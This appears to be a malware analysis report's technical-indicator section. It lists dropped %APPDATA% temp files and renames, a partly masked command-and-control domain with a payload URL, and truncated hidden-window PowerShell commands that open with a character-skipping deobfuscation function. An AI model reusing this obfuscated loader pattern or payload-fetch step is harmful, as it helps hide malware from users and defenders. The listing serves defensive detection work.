Technical Information
- %APPDATA%\bitaf9f.tmp
- %APPDATA%\bit261.tmp
- %APPDATA%\bitaf9f.tmp
- %APPDATA%\bit261.tmp
- from %APPDATA%\bitaf9f.tmp to %APPDATA%\bogs.lav
- from %APPDATA%\bit261.tmp to %APPDATA%\bogs.lav
- 'st#####michaelsmith.com':80
- http://st#####michaelsmith.com/k2/Spartan.asi
- DNS ASK st#####michaelsmith.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Unde9 ([String]$Acatapos){For($Spectr=4; $Spectr -lt $Acatapos.Length-1; $Spectr+=(4+1)){$Fangsno=$Acatapos.Substring( $Spectr, 1);$Eyeop+=$Fangsno};$Eyeop;}$Spises=Unde9 ...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Unde9 ([String]$Acatapos){For($Spectr=4; $Spectr -lt $Acatapos.Length-1; $Spectr+=(4+1)){$Fangsno=$Acatapos.Substring( $Spectr, 1);$Eyeop+=$Fangsno};$Eyeop;}$Spises=Unde9 ...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Unde9 ([String]$Acatapos){For($Spectr=4; $Spectr -lt $Acatapos.Length-1; $Spectr+=(4+1)){$Fangsno=$Acatapos.Substring( $Spectr, 1);$Eyeop+=$Fangsno};$Eyeop;}$Spises=Unde9 ...